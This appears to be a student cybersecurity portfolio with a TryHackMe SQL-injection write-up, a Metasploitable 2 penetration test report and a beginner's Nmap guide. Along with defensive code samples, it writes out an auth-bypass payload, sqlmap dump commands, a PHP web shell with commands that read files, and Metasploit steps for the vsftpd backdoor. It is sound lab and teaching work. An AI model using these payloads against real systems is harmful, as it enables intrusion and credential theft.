Artifact 7 — CTF Writeup: Web Exploitation Challenge
Platform: TryHackMe
Challenge Type: Web Exploitation / SQL Injection
Difficulty: Medium
Date: Summer 2024
Overview
This writeup documents my approach to a web exploitation challenge involving SQL injection and privilege escalation. The challenge required identifying a vulnerability in a login form, exploiting it to access a database, and using retrieved credentials to gain administrative access to the application.
Reconnaissance
I began by navigating to the challenge URL and examining the login page. Using browser developer tools, I inspected the page source and identified that the login form submitted a POST request to /login.php with parameters username and password.
I then ran a basic Nmap scan to identify open ports and services:
nmap -sV -p 80,443,8080 <target_ip>
Results showed port 80 open running Apache 2.4.29 on Ubuntu. No other relevant ports were open.
Identifying the Vulnerability
I tested the login form with a basic SQL injection payload:
Username: admin' --
Password: anything
The application returned a successful login response, confirming that the login form was vulnerable to SQL injection. The -- sequence starts a SQL comment, so the remainder of the query, including the password check, was ignored entirely.
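To make the bypass concrete, here is an added example (not code from the challenge or the writeup) that reproduces the vulnerable string-built query beside the parameterized fix named in the Lessons Learned section, against a constructed in-memory users table; sha256 stands in for whatever hash the real application used.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the challenge's users table. sha256 is used only to
# keep the example short; a real application would use a slow hash such as bcrypt.
def _h(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()

def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT)")
    db.executemany("INSERT INTO users (username, pwhash) VALUES (?, ?)",
                   [("admin", _h("correct horse battery staple")), ("alice", _h("hunter2"))])
    return db

def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    """The pattern the challenge's login form used: user input concatenated into SQL.
    With username "admin' --" the query becomes
    SELECT username FROM users WHERE username = 'admin' --' AND pwhash = '...'
    and everything after -- is a comment, so the password is never checked."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND pwhash = '{_h(password)}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None

def login_fixed(db: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the input is bound as data and never parsed as SQL,
    so "admin' --" is simply a username that does not exist."""
    row = db.execute("SELECT pwhash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    # Constant-time comparison of the stored hash against the supplied password.
    return username if hmac.compare_digest(row[0], _h(password)) else None

if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "admin' --", "anything"))              # admin
    print(login_fixed(db, "admin' --", "anything"))                   # None
    print(login_fixed(db, "admin", "correct horse battery staple"))   # admin
```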
Exploitation
Using sqlmap to automate further SQL injection testing:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" --dbs
This returned the database names present on the server. I then enumerated the tables in the target database:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb --tables
The users table was identified. Dumping its contents:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb -T users --dump
This returned a table containing usernames and hashed passwords. The admin hash was cracked using a wordlist attack with John the Ripper, yielding the plaintext password.
Privilege Escalation
Logging in with the admin credentials revealed an administrative panel with file upload functionality. I tested whether the file upload validated file types by uploading a PHP web shell:
<?php system($_GET['cmd']); ?>
The upload was accepted. Navigating to the uploaded file’s URL and passing a command:
http://<target>/uploads/shell.php?cmd=id
Returned: uid=33(www-data). I now had remote code execution on the server.
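As an added example (not part of the challenge or this writeup), the upload check the admin panel was missing: extension allowlist, content signature and a body scan for a PHP open tag, exercised against the web shell above under several file names. It assumes the upload was meant for images, which the challenge never stated; the three types and the sample files are constructed.

```python
import re

# Assumption: the admin panel's upload was meant for images. Each entry maps an
# allowed extension to the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# A PHP open tag anywhere in the body is rejected regardless of name or header.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def validate_upload(filename: str, content: bytes):
    """Return (accepted, reason); name, content signature and body are all checked."""
    # Only the final extension is trusted: "shell.php.jpg" is judged as jpg and
    # then fails the signature check; "shell.php" fails the allowlist outright.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not allowed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, f"content does not match {ext} signature"
    if PHP_TAG.search(content):
        return False, "embedded PHP tag"
    return True, "ok"

# Constructed sample uploads: the challenge's web shell under three names,
# plus a file that really does start with a PNG header.
SAMPLES = {
    "shell.php": b"<?php system($_GET['cmd']); ?>",
    "shell.php.jpg": b"<?php system($_GET['cmd']); ?>",
    "shell.png": b"\x89PNG\r\n\x1a\n" + b"<?php system($_GET['cmd']); ?>",
    "photo.png": b"\x89PNG\r\n\x1a\n" + bytes(32),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, validate_upload(name, data))
```

Storing uploads outside the web root, or with script execution disabled for that directory, is the complementary control the Lessons Learned section refers to: even a file that slips past validation then cannot run as PHP.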
Flag Retrieval
Using the web shell to navigate the file system, I located the flag file at /home/admin/flag.txt and retrieved it using:
http://<target>/uploads/shell.php?cmd=cat+/home/admin/flag.txt
Lessons Learned
This challenge reinforced several important principles:
- SQL injection remains a critical vulnerability in web applications and is preventable through parameterized queries
- File upload functionality must validate file type, not just extension
- Defense in depth matters: even after gaining code execution, a properly configured web server would have limited what www-data could access
- Methodical enumeration — checking each step before moving to the next — is more effective than rushing toward exploitation
Artifact 8 — Penetration Testing Lab Report
Target Environment: Metasploitable 2 (intentionally vulnerable VM)
Testing Type: Internal network penetration test (simulated)
Date: Summer 2024
Executive Summary
This report documents a penetration test conducted against a Metasploitable 2 virtual machine in a controlled lab environment. The assessment identified multiple critical vulnerabilities that would allow an unauthenticated attacker to gain full administrative control of the target system. All testing was conducted in an isolated lab environment with no impact on production systems.
Risk Rating: Critical
Scope and Methodology
Scope: Single target host — Metasploitable 2 VM (192.168.56.101)
Methodology: PTES (Penetration Testing Execution Standard)
Phases: Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting
Reconnaissance
Passive reconnaissance confirmed the target IP and that the system was reachable on the local network. No external OSINT was conducted given the lab nature of the target.
Scanning and Enumeration
An Nmap scan revealed the following open ports and services:
nmap -sV -O -p- 192.168.56.101
Key findings:
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 2.3.4 |
| 22 | SSH | OpenSSH 4.7p1 |
| 23 | Telnet | Linux telnetd |
| 80 | HTTP | Apache 2.2.8 |
| 3306 | MySQL | 5.0.51a |
| 5900 | VNC | Protocol 3.3 |
The vsftpd 2.3.4 version is known to contain a backdoor vulnerability (CVE-2011-2523).
Exploitation
Vulnerability 1: vsftpd 2.3.4 Backdoor (CVE-2011-2523)
The vsftpd 2.3.4 backdoor is triggered by sending a username containing the sequence :), which causes the server to open a shell listening on port 6200.
Using Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
run
Result: Root shell obtained immediately. No credentials required.
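As an added example that is not part of this report, detection logic a defender could run over an FTP command log and a socket listing, looking for the two signals the finding above describes: the :) trigger in a USER command and a vsftpd listener on TCP 6200. The log format, the listener listing and the process name are constructed for the example.

```python
import re

# Constructed FTP control-channel log (one command per line) and a constructed
# listener listing in netstat-like form; both are sample data for this example.
FTP_LOG = """\
2024-07-01 10:02:11 192.168.56.50 -> 192.168.56.101:21 USER msfadmin
2024-07-01 10:02:11 192.168.56.50 -> 192.168.56.101:21 PASS ********
2024-07-01 10:05:42 192.168.56.50 -> 192.168.56.101:21 USER letmein:)
2024-07-01 10:05:42 192.168.56.50 -> 192.168.56.101:21 PASS anything
"""
LISTENERS = """\
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 1204/vsftpd
tcp 0 0 0.0.0.0:6200 0.0.0.0:* LISTEN 1204/vsftpd
"""

USER_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<src>\S+) -> (?P<dst>\S+):21 USER (?P<user>.*)$")
LISTEN_RE = re.compile(r":(?P<port>\d+)\s+\S+\s+LISTEN\s+(?P<proc>\S+)$")

def find_backdoor_triggers(ftp_log: str) -> list:
    """Return (timestamp, source, username) for USER commands carrying the ':)' trigger."""
    hits = []
    for line in ftp_log.splitlines():
        m = USER_RE.match(line)
        if m and ":)" in m.group("user"):
            hits.append((m.group("ts"), m.group("src"), m.group("user")))
    return hits

def find_backdoor_listener(listeners: str) -> list:
    """Return the processes listening on TCP 6200, the port the backdoor shell binds."""
    return [m.group("proc") for m in map(LISTEN_RE.search, listeners.splitlines())
            if m and m.group("port") == "6200"]

if __name__ == "__main__":
    # Either signal alone is worth an alert; both together is a confirmed trigger.
    for ts, src, user in find_backdoor_triggers(FTP_LOG):
        print(f"{ts} CVE-2011-2523 trigger from {src}: USER {user!r}")
    for proc in find_backdoor_listener(LISTENERS):
        print(f"backdoor shell listener on tcp/6200: {proc}")
```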
Vulnerability 2: Telnet with Default Credentials
Telnet was accessible with the default credentials msfadmin:msfadmin, providing a second avenue for administrative access.
Post-Exploitation
With root access established, the following post-exploitation activities were performed:
- Confirmed root privileges with the id command
- Retrieved /etc/passwd and /etc/shadow for offline password cracking (simulated)
- Demonstrated ability to create new user accounts
- Confirmed access to MySQL database with default root credentials (no password)
Findings Summary
| Finding | Severity | CVE |
|---|---|---|
| vsftpd 2.3.4 backdoor | Critical | CVE-2011-2523 |
| Telnet enabled with default credentials | Critical | N/A |
| MySQL accessible with no root password | Critical | N/A |
| SSH running outdated version | High | Multiple |
| VNC accessible without authentication | Critical | N/A |
Recommendations
- Replace vsftpd 2.3.4 immediately with a current, supported version
- Disable Telnet and use SSH exclusively for remote administration
- Set a strong password for the MySQL root account and restrict remote access
- Update all services to current supported versions
- Implement host-based firewall rules to restrict access to sensitive ports
Conclusion
The Metasploitable 2 system is intentionally vulnerable and serves as a valuable learning environment. In a real-world context, the vulnerabilities identified here would represent an unacceptable risk. This assessment demonstrates the value of regular penetration testing: vulnerabilities that are known and documented can be remediated; vulnerabilities that are undiscovered cannot.
Artifact 9 — NEW ARTIFACT: Beginner’s Guide to Nmap for Cybersecurity Students
Type: Original Educational Resource
Created for: IDS E-Portfolio Project
Date: Fall 2024
Introduction
If you are just beginning your journey in cybersecurity, you will encounter Nmap within your first few weeks. Nmap (Network Mapper) is a free, open-source tool used for network discovery and security auditing. It is one of the most widely used tools in the field — used by penetration testers, SOC analysts, network administrators, and security researchers every day.
This guide is written for students who have never used Nmap before. By the end, you will understand what Nmap does, how to run basic scans, how to interpret the results, and how to use that information in a security context.
What Does Nmap Do?
Nmap sends specially crafted packets to a target system and analyzes the responses. From those responses, it can determine:
- Which hosts are online on a network
- Which ports are open on those hosts
- What services are running on those ports
- What operating system a host is likely running
This information is foundational to both attacking and defending networks. A penetration tester uses Nmap to understand a target before attempting exploitation. A defender uses it to audit their own network and make sure only expected services are exposed.
Installing Nmap
Nmap is pre-installed on Kali Linux. If you are using another system:
Linux (Debian/Ubuntu):
sudo apt-get install nmap
Windows: Download the installer from https://nmap.org/download.html
Mac:
brew install nmap
Your First Scan: Ping Sweep
A ping sweep tells you which hosts are alive on a network. This is usually the first thing you do when assessing a network.
nmap -sn 192.168.1.0/24
The -sn flag means “scan for hosts only, no port scan.” The /24 means you are scanning all 256 addresses in the 192.168.1.x range.
Example output:
Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
Nmap scan report for 192.168.1.105
Host is up (0.0021s latency).
This tells you that two hosts are online: the router (1.1) and one other device (1.105).
Port Scanning Basics
Once you know a host is alive, you want to know what ports are open. Open ports mean running services. Running services are potential entry points.
Basic TCP scan:
nmap 192.168.1.105
By default, Nmap scans the 1,000 most common ports.
Scan all 65,535 ports:
nmap -p- 192.168.1.105
Scan specific ports:
nmap -p 22,80,443,3389 192.168.1.105
Service and Version Detection
Knowing a port is open is useful. Knowing what is running on that port is more useful.
nmap -sV 192.168.1.105
The -sV flag attempts to determine the service name and version number for each open port.
Example output:
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4
80/tcp   open  http    Apache httpd 2.4.29
3306/tcp open  mysql   MySQL 5.7.30
This tells you exactly what is running. You can now research whether any of these specific versions have known vulnerabilities.
Operating System Detection
nmap -O 192.168.1.105
Nmap will attempt to fingerprint the operating system based on how the target responds to certain probes. This is not always 100% accurate, but it is a useful starting point.
Putting It Together: A Comprehensive Scan
For most learning scenarios, this command gives you a thorough picture:
nmap -sV -O -A 192.168.1.105
The -A flag enables aggressive scanning: OS detection, version detection, script scanning, and traceroute. Be aware that aggressive scans generate more network traffic and are more likely to be detected by security tools.
Reading Nmap Output
Every Nmap scan result has a few key fields:
- PORT: The port number and protocol (e.g., 80/tcp)
- STATE: open, closed, or filtered
  - Open = something is listening here
  - Closed = port is reachable but nothing is listening
  - Filtered = a firewall may be blocking the probe
- SERVICE: The name of the expected service for that port
- VERSION: The specific software version (with -sV)
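As an added example (not part of this guide), a small parser for the output format shown above, using the fields just listed, together with the defender's use described earlier: comparing the open ports found against a baseline of what should be exposed. The scan text and the baseline are constructed; the parser also handles ping-sweep output, where a host line is followed by no port rows.

```python
import re
from typing import Dict, List

# Constructed sample in the format of Nmap's normal output for one host, as
# produced by nmap -sV (a ping sweep produces only the first two lines per host).
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.105
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 7.4
80/tcp   open     http       Apache httpd 2.4.29
3306/tcp open     mysql      MySQL 5.7.30
8080/tcp filtered http-proxy
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap(text: str) -> Dict[str, List[dict]]:
    """Map each host in the report to its PORT/STATE/SERVICE/VERSION rows."""
    hosts, current = {}, None
    for line in text.splitlines():
        h = HOST_RE.match(line)
        if h:
            current = h.group(1)
            hosts[current] = []
            continue
        p = PORT_RE.match(line)
        if p and current:
            port, proto, state, service, version = p.groups()
            hosts[current].append({"port": int(port), "proto": proto, "state": state,
                                   "service": service, "version": version or ""})
    return hosts

def unexpected_open_ports(hosts: Dict[str, List[dict]], baseline: Dict[str, set]) -> Dict[str, List[dict]]:
    """Defender's audit: open ports the baseline (host -> expected open ports) does not list."""
    findings = {}
    for host, rows in hosts.items():
        extra = [r for r in rows if r["state"] == "open" and r["port"] not in baseline.get(host, set())]
        if extra:
            findings[host] = extra
    return findings

if __name__ == "__main__":
    # Baseline is constructed: this host is supposed to expose only SSH and HTTP.
    for host, rows in unexpected_open_ports(parse_nmap(SAMPLE_OUTPUT), {"192.168.1.105": {22, 80}}).items():
        for r in rows:
            print(f"{host}: unexpected open {r['port']}/{r['proto']} ({r['service']} {r['version']})")
```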
Legal and Ethical Reminder
Nmap is a powerful tool. Only scan systems you own or have explicit written permission to scan. Scanning systems without permission is illegal in most jurisdictions and can result in serious consequences. In a learning context, always use dedicated lab environments like Metasploitable VMs, TryHackMe rooms, or Hack The Box machines.
Next Steps
Once you are comfortable with Nmap, explore:
- Nmap Scripting Engine (NSE): Automates advanced tasks like vulnerability detection
- Zenmap: A graphical interface for Nmap, good for visualizing results
- Wireshark: Packet capture tool that complements Nmap by letting you see the actual traffic
- Metasploit: Use Nmap findings as input for exploitation in lab environments
Conclusion
Nmap is one of the first tools you will learn and one of the last tools you will stop using. Its simplicity is deceptive — behind a few command-line flags is a remarkably powerful capability to understand any network you are authorized to assess. Practice it regularly, document your results carefully, and always work ethically. The foundation you build with Nmap will serve your entire cybersecurity career.